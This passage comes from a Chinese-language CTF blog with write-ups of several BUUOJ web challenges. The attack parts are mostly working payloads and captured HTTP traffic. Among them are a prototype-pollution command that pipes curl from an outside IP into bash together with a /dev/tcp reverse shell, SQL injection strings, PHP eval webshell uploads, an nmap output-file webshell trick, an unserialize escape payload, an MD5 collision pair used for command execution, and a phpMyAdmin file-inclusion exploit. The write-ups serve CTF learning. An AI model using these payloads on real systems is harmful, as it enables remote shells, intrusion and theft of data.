(id && author && enote) { notes.edit_note(id, author, enote); res.render('mess' , {message : "edit note sucess" }); } else { res.render('mess' , {message : "edit note failed" }); } }) app.route('/delete_note' ) .get(function (req, res ) res.render('mess' , {message : "please use POST to delete a note" }); }) .post(function (req, res ) let id = req.body.id; if (id) { notes.remove_note(id); res.render('mess' , {message : "delete done" }); } else { res.render('mess' , {message : "delete failed" }); } }) app.route('/notes' ) .get(function (req, res ) let q = req.query.q; let a_note; if (typeof (q) === "undefined" ) { a_note = notes.get_all_notes(); } else { a_note = notes.get_note(q); } res.render('note' , {list : a_note}); }) app.route('/status' ) .get(function (req, res ) let commands = { "script-1" : "uptime" , "script-2" : "free -m" }; for (let index in commands) { exec(commands[index], {shell :'/bin/bash' }, (err, stdout, stderr ) => { if (err) { return ; } console .log(`stdout: ${stdout} ` ); }); } res.send('OK' ); res.end(); }) app.use(function (req, res, next ) res.status(404 ).send('Sorry cant find that!' ); }); app.use(function (err, req, res, next ) console .error(err.stack); res.status(500 ).send('Something broke!' ); }); const port = 8080 ;app.listen(port, () => console .log(`Example app listening at http://localhost:${port} ` ))
通过路由/edit_note 污染原型链,然后访问/status触发payload
1 2 3 4 id=__proto__.abc&author=curl%20http://174.1.147.117/shell.txt|bash&raw=a //shell.txt bash -i >& /dev/tcp/174.1.147.117/9999 0>&1
[极客大挑战 2019]HardSQL 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 GET /check.php?username=aaa&password=0%27or%281%29%23 HTTP/1.1Host : d54eb507-84b5-4c04-a0ee-f9981df4dc65.node3.buuoj.cnPragma : no-cacheCache-Control : no-cacheUpgrade-Insecure-Requests : 1User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.26 Safari/537.36 Edg/85.0.564.13Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding : gzip, deflateAccept-Language : zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6Connection : closeHTTP/1.1 200 OK Server : openrestyDate : Mon, 27 Jul 2020 16:54:55 GMTContent-Type : text/html; charset=UTF-8Content-Length : 550Connection : closeX-Powered-By : PHP/7.3.11<!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>check</title> </head> <div style="position: absolute;bottom: 0;width: 99%;"><p align="center" style="font:italic 15px Georgia,serif;color:white;"> Syclover @ cl4y</p></div> <body background='./image/background.jpg' style='background-repeat:no-repeat ;background-size:100% 100%; background-attachment: fixed;'> <br><br><br> <h1 style='font-family:verdana;color:red;text-align:center;font-size:40px;'>Login Success!!</h1> </br> </body> </html>
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 http://d54eb507-84b5-4c04-a0ee-f9981df4dc65.node3.buuoj.cn/check.php?username=1&password='or(extractvalue(0x0a%2Cconcat(0x0a%2C(select (database ())))))%23 http ://d54eb507-84 b5-4 c04-a0ee-f9981df4dc65.node3.buuoj.cn/check.php?username=1 &password ='or(extractvalue(0x0a%2Cconcat(0x0a%2C(select(group_concat(column_name))from(information_schema.columns)where((table_schema)like(database()))))))%23 #XPATH syntax error: ' id ,username,password ' http://d54eb507-84b5-4c04-a0ee-f9981df4dc65.node3.buuoj.cn/check.php ?username=1 &password=' or (extractvalue(0x0a %2 Cconcat(0x0a %2 C(select (group_concat (table_name))from (information_schema.tables)where ((table_schema)like (database ()))))))%23 http ://d54eb507-84 b5-4 c04-a0ee-f9981df4dc65.node3.buuoj.cn/check.php?username=1 &password ='or(extractvalue(0x0a%2Cconcat(0x0a%2C(select(password)from(H4rDsq1)))))%23 #XPATH syntax error: ' flag{9 dd67d66-6e19 -45 bb-9 beb-39 ' http://d54eb507-84b5-4c04-a0ee-f9981df4dc65.node3.buuoj.cn/check.php ?username=1 &password=' or (extractvalue(0x0a %2 Cright(concat (0x0a %2 C(select (password )from (H4rDsq1)))%2 C36)))%23 http ://d54eb507-84 b5-4 c04-a0ee-f9981df4dc65.node3.buuoj.cn/check.php?username=1 &password ='or(extractvalue(0x0a%2Cright(concat(0x0a%2C(select(group_concat(schema_name))from(information_schema.schemata)))%2C32)))%23 #XPATH syntax error: ' ,test ,geek' http://d54eb507-84b5-4c04-a0ee-f9981df4dc65.node3.buuoj.cn/check.php?username=1&password=' or (extractvalue(0x0a %2 Cleft(concat (0x0a %2 C(select (group_concat (schema_name))from (information_schema.schemata)))%2 C32)))%23
PHP escapeshellarg()+escapeshellcmd() 之殇
谈escapeshellarg绕过与参数注入漏洞
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 <?php if (isset ($_SERVER['HTTP_X_FORWARDED_FOR' ])) { $_SERVER['REMOTE_ADDR' ] = $_SERVER['HTTP_X_FORWARDED_FOR' ]; } if (!isset ($_GET['host' ])) { highlight_file(__FILE__ ); } else { $host = $_GET['host' ]; $host = escapeshellarg($host); $host = escapeshellcmd($host); $sandbox = md5("glzjin" . $_SERVER['REMOTE_ADDR' ]); echo 'you are in sandbox ' .$sandbox; @mkdir($sandbox); chdir($sandbox); echo system("nmap -T5 -sT -Pn --host-timeout 2 -F " .$host); }
1 2 3 OUTPUT: -oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3, and Grepable format, respectively, to the given filename.
利用output输出执行记录 从而构造 webshell.php,如下图
将webshell作为查询ip并保存在1.php下
本来的想法是再执行一个命令,但如下面说明:
escapeshellcmd() 对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义。 此函数保证用户输入的数据在传送到 exec() 或 system() 函数,或者 执行操作符 之前进行转义。
反斜线(\)会在以下字符之前插入: &#;`|*?~<>^()[]{}$, \x0A 和 \xFF。 ‘ 和 “ 仅在不配对儿的时候被转义。 在 Windows 平台上,所有这些字符以及 % 和 ! 字符都会被空格代替。
此路不通。
换个思路,写webshell,这一点一开始没想到,看别人博客才知道.菜
利用escapeshellarg()+escapeshellcmd() 绕过',
1 2 3 4 5 string(9) "1' new_IP" string(14) "'1'\'' new_IP'" string(16) "'1'\\'' new_IP\'" # '1'\\'' == '1'+\\'' you are in sandbox 6e0de596e0dfd3884f1d7cc901ead8d9 string(53) "nmap -T5 -sT -Pn --host-timeout 2 -F '1'\\'' new_IP\'"
在nmap命令中 '1'\\'' == '1' +转意后的\+''(也就是空)
此外对于new_IP\'" 也可以在此利用'进行绕过 如下
1 2 3 4 5 string(23) "1' new_IP -oG new.php '" string(31) "'1'\'' new_IP -oG new.php '\'''" string(33) "'1'\\'' new_IP -oG new.php '\\'''" you are in sandbox 6e0de596e0dfd3884f1d7cc901ead8d9 string(70) "nmap -T5 -sT -Pn --host-timeout 2 -F '1'\\'' new_IP -oG new.php '\\'''"
从而构造另一个要查询的ip,也就是webshell
如下:
1 1' <?php phpinfo();?> -oG new.php '
[ACTF2020 新生赛]Upload 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 POST / HTTP/1.1 Host: 4bcd4b52-7c7b-4c97-82b3-086876b461be.node3.buuoj.cn Content-Length: 324 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://4bcd4b52-7c7b-4c97-82b3-086876b461be.node3.buuoj.cn Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryR0XkBShZAZ5y7Yfn User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.26 Safari/537.36 Edg/85.0.564.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://4bcd4b52-7c7b-4c97-82b3-086876b461be.node3.buuoj.cn/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6 Connection: close ------WebKitFormBoundaryR0XkBShZAZ5y7Yfn Content-Disposition: form-data; name="upload_file"; filename="fe1w0.phtml" Content-Type: image/jpeg <?php eval($_GET[xz]); ?> ------WebKitFormBoundaryR0XkBShZAZ5y7Yfn Content-Disposition: form-data; name="submit" upload ------WebKitFormBoundaryR0XkBShZAZ5y7Yfn--
前端检验+后端黑名单设置
[GXYCTF2019]BabySQli
1 2 3 4 5 MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5 # base32 c2VsZWN0ICogZnJvbSB1c2VyIHdoZXJlIHVzZXJuYW1lID0gJyRuYW1lJw== # base64 select * from user where username = '$name'
此题要是不告诉你,完整的代码逻辑有点坑。
以下代码是BUU的连接,不知道实际比赛时有没有
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 <!--MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5--> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Do you know who am I?</title> <?php require "config.php" ;require "flag.php" ;if (get_magic_quotes_gpc()) { function stripslashes_deep ($value ) { $value = is_array($value) ? array_map('stripslashes_deep' , $value) : stripslashes($value); return $value; } $_POST = array_map('stripslashes_deep' , $_POST); $_GET = array_map('stripslashes_deep' , $_GET); $_COOKIE = array_map('stripslashes_deep' , $_COOKIE); $_REQUEST = array_map('stripslashes_deep' , $_REQUEST); } mysqli_query($con,'SET NAMES UTF8' ); $name = $_POST['name' ]; $password = $_POST['pw' ]; $t_pw = md5($password); $sql = "select * from user where username = '" .$name."'" ; $result = mysqli_query($con, $sql); if (preg_match("/\(|\)|\=|or/" , $name)){ die ("do not hack me!" ); } else { if (!$result) { printf("Error: %s\n" , mysqli_error($con)); exit (); } else { $arr = mysqli_fetch_row($result); if ($arr[1 ] == "admin" ){ if (md5($password) == $arr[2 ]){ echo $flag; } else { die ("wrong pass!" ); } } else { die ("wrong user!" ); } } } ?>
此题的验证逻辑
首先,查询username=$user 的用户信息,并转为数组
若$user 符合黑名单,报错
符合,则判断md5($pw) == password
成功,返回flag
思路
在第一步的得到的表中插入一条数据,如:
1 2 3 4 5 6 7 mysql> select 'admin',md5('fe1w0'); + | admin | md5('fe1w0') | + | admin | d49fd2c918d8ab7c3b8111269023f888 | + 1 row in set (0.00 sec)
[GYCTF2020]Blacklist
1 return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i" ,$inject);
mysql查询语句-handler
1 http://d819a190-8282-41a9-90a8-72af5b375e27.node3.buuoj.cn/?inject=-1';HANDLER FlagHere OPEN;HANDLER FlagHere READ FIRST;
[0CTF 2016]piapiapia 1 PS D:\fe1w0\tool\web & permeation\dirpath_search\dirsearch> python3 .\dirsearch.py -u "http://6e4630e8-a6e7-4e79-8b69-cc8f03111332.node3.buuoj.cn/" -e php --delay=0.5
根据扫描结果得到www.zip文件
大致运行逻辑:
register
login 获得session
update 更新个人信息,序列化profile
profile 将序列化profile进行反序列化
漏洞:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 public function update ($table, $key, $value, $where ) $sql = "UPDATE $table SET $key = '$value ' WHERE $where " ; return mysql_query($sql); } public function filter ($string ) $escape = array ('\'' , '\\\\' ); $escape = '/' . implode('|' , $escape) . '/' ; $string = preg_replace($escape, '_' , $string); $safe = array ('select' , 'insert' , 'update' , 'delete' , 'where' ); $safe = '/' . implode('|' , $safe) . '/i' ; return preg_replace($safe, 'hacker' , $string); }
1 2 3 4 5 6 7 8 9 10 11 12 13 14 public function show_profile ($username ) $username = parent ::filter($username); $where = "username = '$username '" ; $object = parent ::select($this ->table, $where); return $object->profile; } public function update_profile ($username, $new_profile ) $username = parent ::filter($username); $new_profile = parent ::filter($new_profile); $where = "username = '$username '" ; return parent ::update($this ->table, 'profile' , $new_profile, $where); }
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 <?php require_once ('class.php' ); if ($_SESSION['username' ] == null ) { die ('Login First' ); } $username = $_SESSION['username' ]; $profile=$user->show_profile($username); if ($profile == null ) { header('Location: update.php' ); } else { $profile = unserialize($profile); $phone = $profile['phone' ]; $email = $profile['email' ]; $nickname = $profile['nickname' ]; $photo = base64_encode(file_get_contents($profile['photo' ])); ?>
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 <?php require_once ('class.php' ); if ($_SESSION['username' ] == null ) { die ('Login First' ); } if ($_POST['phone' ] && $_POST['email' ] && $_POST['nickname' ] && $_FILES['photo' ]) { $username = $_SESSION['username' ]; if (!preg_match('/^\d{11}$/' , $_POST['phone' ])) die ('Invalid phone' ); if (!preg_match('/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\.[_a-zA-Z0-9]{1,10}$/' , $_POST['email' ])) die ('Invalid email' ); if (preg_match('/[^a-zA-Z0-9_]/' , $_POST['nickname' ]) || strlen($_POST['nickname' ]) > 10 ) die ('Invalid nickname' ); $file = $_FILES['photo' ]; if ($file['size' ] < 5 or $file['size' ] > 1000000 ) die ('Photo size error' ); move_uploaded_file($file['tmp_name' ], 'upload/' . md5($file['name' ])); $profile['phone' ] = $_POST['phone' ]; $profile['email' ] = $_POST['email' ]; $profile['nickname' ] = $_POST['nickname' ]; $profile['photo' ] = 'upload/' . md5($file['name' ]); $user->update_profile($username, serialize($profile)); echo 'Update Profile Success!<a href="profile.php">Your Profile</a>' ; } else { ?>
一个正常的PHP反序列化
1 a:4 :{s:5 :"phone" ;i:12345678901 ;s:5 :"email" ;s:11 :"123@123.com" ;s:8 :"nickname" ;a:1 :{i:0 ;s:12 :"xzasxzasxzas" ;}s:5 :"photo" ;s:39 :"upload/405ccd25d52f1fbf76ba04be9a371afd" ;}
想要的PHP反序列化
1 a:4 :{s:5 :"phone" ;i:12345678901 ;s:5 :"email" ;s:11 :"123@123.com" ;s:8 :"nickname" ;a:1 :{i:0 ;s:12 :"xzasxzasxzas" ;}s:5 :"photo" ;s:10 :"config.php" ;}
首先只考虑序列化和反序列过程,且假设上传过程中没有处理。
1 2 3 4 5 6 7 <?php $profile['phone' ] =12345678901 ; $profile['email' ] = "123@123.com" ; $profile['nickname' ] = ['xzasxzasxzas";}s:5:"photo";s:10:"config.php' ]; $profile['photo' ] = 'upload/' . md5("xzas" ); echo serialize($profile);
由于在序列化中nickname的长度为43,反序列化时,也是一直读到;,并没有出现我们想要的结果
1 s:43 :"xzasxzasxzas" ;}s:5 :"photo" ;s:10 :"config.php" ;
但由于执行update_profile()之前会对参数进行过滤,见class.php - class mysql->filter() ,其可以将黑名单中的参数替换成hacker,这样会导致序列化结果产生长度变化。
如where->hacker,实际上的字符串长度加一,但序列化中的s:xxxx值没有变化,从而导致PHP反序列化逃逸
由于需要挤出去的字符串长度为31,则需要31个where即可
1 2 3 php > $a ='";}s:5:"photo";s:10:"config.php' ; php > echo strlen($a); 31
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 <?php $profile['phone' ] =12345678901 ; $profile['email' ] = "123@123.com" ; $profile['nickname' ] = ['wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php' ]; $profile['photo' ] = 'upload/' . md5("xzas" ); function filter ($string ) $escape = array ('\'' , '\\\\' ); $escape = '/' . implode('|' , $escape) . '/' ; $string = preg_replace($escape, '_' , $string); $safe = array ('select' , 'insert' , 'update' , 'delete' , 'where' ); $safe = '/' . implode('|' , $safe) . '/i' ; return preg_replace($safe, 'hacker' , $string); } echo serialize($profile);echo "\n" ;echo filter(serialize($profile));echo "\n" ;print_r(unserialize(filter(serialize($profile))));
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 POST /update.php HTTP/1.1Host : 6e4630e8-a6e7-4e79-8b69-cc8f03111332.node3.buuoj.cnContent-Length : 171589Cache-Control : max-age=0Upgrade-Insecure-Requests : 1Origin : http://6e4630e8-a6e7-4e79-8b69-cc8f03111332.node3.buuoj.cnContent-Type : multipart/form-data; boundary=----WebKitFormBoundaryq1cAFarAvJr8wA7FUser-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4204.0 Safari/537.36 Edg/86.0.587.0Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer : http://6e4630e8-a6e7-4e79-8b69-cc8f03111332.node3.buuoj.cn/update.phpAccept-Encoding : gzip, deflateAccept-Language : zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6Cookie : PHPSESSID=fcce49634c704a465362161ce527a768Connection : close------WebKitFormBoundaryq1cAFarAvJr8wA7F Content-Disposition : form-data; name="phone"12345678901 ------WebKitFormBoundaryq1cAFarAvJr8wA7F Content-Disposition : form-data; name="email"123@123.com ------WebKitFormBoundaryq1cAFarAvJr8wA7F Content-Disposition : form-data; name="nickname[]"wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php
[GXYCTF2019]禁止套娃
1 python .\git_extract.py "http://26f894ca-16f4-48bb-8e21-af104be9918b.node3.buuoj.cn/.git/"
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 <?php include "flag.php" ;echo "flag在哪里呢?<br>" ;if (isset ($_GET['exp' ])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i' , $_GET['exp' ])) { if (';' === preg_replace('/[a-z,_]+\((?R)?\)/' , NULL , $_GET['exp' ])) { if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i' , $_GET['exp' ])) { @eval ($_GET['exp' ]); } else { die ("还差一点哦!" ); } } else { die ("再好好想想!" ); } } else { die ("还想读flag,臭弟弟!" ); } } ?>
https://skysec.top/2019/03/29/PHP-Parametric-Function-RCE
https://www.cnblogs.com/wangtanzhi/p/12260986.html
这里采用highlight_file(session_id(session_start()));来过,其他方法可以参考上面的连接
1 2 3 4 5 6 7 8 import requestsurl = 'http://26f894ca-16f4-48bb-8e21-af104be9918b.node3.buuoj.cn/?exp=highlight_file(session_id(session_start()));' payload = "flag.php" cookies = { 'PHPSESSID' :payload } r = requests.get(url=url,cookies=cookies) print r.content
[SUCTF 2019]Pythonginx
源码:https://github.com/team-su/SUCTF-2019/blob/master/Web/pythonginx
源代码 以及提示
<!-- Dont worry about the suctf.cc. Go on! --> <!-- Do you know the nginx? -->
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 @app.route('/getUrl', methods=['GET', 'POST']) def getUrl (): url = request.args.get("url" ) host = parse.urlparse(url).hostname if host == 'suctf.cc' : return "我扌 your problem? 111" parts = list(urlsplit(url)) host = parts[1 ] if host == 'suctf.cc' : return "我扌 your problem? 222 " + host newhost = [] for h in host.split('.' ): newhost.append(h.encode('idna' ).decode('utf-8' )) parts[1 ] = '.' .join(newhost) finalUrl = urlunsplit(parts).split(' ' )[0 ] host = parse.urlparse(finalUrl).hostname if host == 'suctf.cc' : return urllib.request.urlopen(finalUrl).read() else : return "我扌 your problem? 333"
参考:https://blog.csdn.net/qq_42181428/article/details/99741920
要绕过1、2两个if判断,且符合第三个判断,才可以读取文件。
利用知识点1、2 构造webshell
1 2 3 4 5 6 7 8 9 10 for i in range(128 ,65537 ): tmp=chr(i) try : res = tmp.encode('idna' ).decode('utf-8' ) if ("-" ) in res: continue print("U:{} A:{} ascii:{} " .format(tmp, res, i)) except : pass
配置文件存放目录:/etc/nginx
主配置文件:/etc/nginx/conf/nginx.conf
管理脚本:/usr/lib64/systemd/system/nginx.service
模块:/usr/lisb64/nginx/modules
应用程序:/usr/sbin/nginx
程序默认存放位置:/usr/share/nginx/html
日志默认存放位置:/var/log/nginx
配置文件目录为:/usr/local/nginx/conf/nginx.conf
https://www.cnblogs.com/wangtanzhi/p/12181032.html
1 2 3 4 5 file://suctf.c℆sr/local/nginx/conf/nginx.conf file://suctf.ⒸⒸ/usr/local/nginx/conf/nginx.conf server { listen 80; location / { try_files $uri @app; } location @app { include uwsgi_params; uwsgi_pass unix:///tmp/uwsgi.sock; } location /static { alias /app/static; } # location /flag { # alias /usr/fffffflag; # } }
[安洵杯 2019]easy_web
https://github.com/D0g3-Lab/i-SOON_CTF_2019/tree/master/Web/easy_web
1 2 3 4 5 6 7 8 9 10 11 12 GET /index.php?img=TmprMlpUWTBOalUzT0RKbE56QTJPRGN3&cmd= HTTP/1.1Host : 647f9c79-b48c-4728-9de0-46bfb66380bd.node3.buuoj.cnPragma : no-cacheCache-Control : no-cacheUpgrade-Insecure-Requests : 1User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4204.0 Safari/537.36 Edg/86.0.587.0Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding : gzip, deflateAccept-Language : zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6Connection : close
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 <?php error_reporting(E_ALL || ~ E_NOTICE); header('content-type:text/html;charset=utf-8' ); $cmd = $_GET['cmd' ]; if (!isset ($_GET['img' ]) || !isset ($_GET['cmd' ])) header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=' ); $file = hex2bin(base64_decode(base64_decode($_GET['img' ]))); $file = preg_replace("/[^a-zA-Z0-9.]+/" , "" , $file); if (preg_match("/flag/i" , $file)) { echo '<img src ="./ctf3.jpeg">' ; die ("xixi~ no flag" ); } else { $txt = base64_encode(file_get_contents($file)); echo "<img src='data:image/gif;base64," . $txt . "'></img>" ; echo "<br>" ; } echo $cmd;echo "<br>" ;if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i" , $cmd)) { echo ("forbid ~" ); echo "<br>" ; } else { if ((string )$_POST['a' ] !== (string )$_POST['b' ] && md5($_POST['a' ]) === md5($_POST['b' ])) { echo `$cmd`; } else { echo ("md5 is funny ~" ); } } ?> <html> <style> body{ background:url(./bj.png) no-repeat center center; background-size:cover; background-attachment:fixed; background-color: } </style> <body> </body> </html>
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 POST /index.php?img=&cmd=ca\t%20/flag HTTP/1.1Host : 647f9c79-b48c-4728-9de0-46bfb66380bd.node3.buuoj.cnContent-Length : 773Pragma : no-cacheCache-Control : no-cacheUpgrade-Insecure-Requests : 1User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4204.0 Safari/537.36 Edg/86.0.587.0Origin : http://647f9c79-b48c-4728-9de0-46bfb66380bd.node3.buuoj.cnContent-Type : application/x-www-form-urlencodedAccept : text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer : http://647f9c79-b48c-4728-9de0-46bfb66380bd.node3.buuoj.cn/index.php?img=&cmd=ca\t%20/flagAccept-Encoding : gzip, deflateAccept-Language : zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6Connection : closea=%d1%31%dd%02%c5%e6%ee%c4%69%3d%9a%06%98%af%f9%5c%2f%ca%b5%07%12%46%7e%ab%40%04%58%3e%b8%fb%7f%89%55%ad%34%06%09%f4%b3%02%83%e4%88%83%25%f1%41%5a%08%51%25%e8%f7%cd%c9%9f%d9%1d%bd%72%80%37%3c%5b%d8%82%3e%31%56%34%8f%5b%ae%6d%ac%d4%36%c9%19%c6%dd%53%e2%34%87%da%03%fd%02%39%63%06%d2%48%cd%a0%e9%9f%33%42%0f%57%7e%e8%ce%54%b6%70%80%28%0d%1e%c6%98%21%bc%b6%a8%83%93%96%f9%65%ab%6f%f7%2a%70&b=%d1%31%dd%02%c5%e6%ee%c4%69%3d%9a%06%98%af%f9%5c%2f%ca%b5%87%12%46%7e%ab%40%04%58%3e%b8%fb%7f%89%55%ad%34%06%09%f4%b3%02%83%e4%88%83%25%71%41%5a%08%51%25%e8%f7%cd%c9%9f%d9%1d%bd%f2%80%37%3c%5b%d8%82%3e%31%56%34%8f%5b%ae%6d%ac%d4%36%c9%19%c6%dd%53%e2%b4%87%da%03%fd%02%39%63%06%d2%48%cd%a0%e9%9f%33%42%0f%57%7e%e8%ce%54%b6%70%80%a8%0d%1e%c6%98%21%bc%b6%a8%83%93%96%f9%65%2b%6f%f7%2a%70
[GWCTF 2019]我有一个数据库
phpmyadmin 4.8.1任意文件包含 CVE-2018-12613
https://blog.csdn.net/qq_33020901/article/details/80829269
https://blog.51cto.com/13770310/2131305?source=dra
1 2 show variables like 'datadir' ;
1 http://e733f3ba-a431-4612-8a5e-3458d4c9cb30.node3.buuoj.cn/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../flag
[BJDCTF2020]Mark loves cat
https://github.com/BjdsecCA/BJDCTF2020
推荐用GITHACK,之前那个有问题
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 <?php include 'flag.php' ;$yds = "dog" ; $is = "cat" ; $handsome = 'yds' ; foreach ($_POST as $x => $y){ $$x = $y; } foreach ($_GET as $x => $y){ $$x = $$y; } foreach ($_GET as $x => $y){ if ($_GET['flag' ] === $x && $x !== 'flag' ){ exit ($handsome); } } if (!isset ($_GET['flag' ]) && !isset ($_POST['flag' ])){ exit ($yds); } if ($_POST['flag' ] === 'flag' || $_GET['flag' ] === 'flag' ){ exit ($is); } echo "the flag is: " .$flag;
1 2 3 <?php $flag = file_get_contents('/flag' );
GET /index.html?yds=flag
[ASIS 2019]Unicorn shop
和[SUCTF 2019]Pythonginx 差不多
题目里1-3应该是没有的,只要4还在。
可以在https://www.compart.com/en/unicode/search?q=thousand#characters 搜索
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 POST /charge HTTP/1.1Host : 39cdace4-94e5-49c3-a6fb-796279314616.node3.buuoj.cnContent-Length : 26Cache-Control : max-age=0Upgrade-Insecure-Requests : 1Origin : http://39cdace4-94e5-49c3-a6fb-796279314616.node3.buuoj.cnContent-Type : application/x-www-form-urlencodedUser-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4204.0 Safari/537.36 Edg/86.0.587.0Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer : http://39cdace4-94e5-49c3-a6fb-796279314616.node3.buuoj.cn/chargeAccept-Encoding : gzip, deflateAccept-Language : zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6Connection : closeid=4&price=%25E2%2586%2588 HTTP/1.1 200 OK Server : openrestyDate : Sat, 01 Aug 2020 20:15:56 GMTContent-Type : text/html; charset=UTF-8Content-Length : 2572Connection : close<!DOCTYPE html> <html lang="zh-CN"> <head> <meta charset="utf-8"><!--Ah,really important,seriously. --> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Unicorn shop</title> <!-- Don't be frustrated by the same view,we've changed the challenge content.--> <!-- Bootstrap core CSS --> <link href="/static/css/bootstrap.min.css?v=ec3bb52a00e176a7181d454dffaea219" rel="stylesheet"> <!-- Custom styles for this template --> <link href="/static/css/jumbotron-narrow.css?v=166844ff66a82256d62737c8a6fc14bf" rel="stylesheet"> </head> <!--We still have some surprise for admin.password--> <body> <div class="container"> <div class="alert alert-success alert-dismissable"> 操作成功。 </div> <div class="alert alert-success alert-dismissable"> flag{20386a66-bd60-4439-962d-962f7d6122fd} </div>
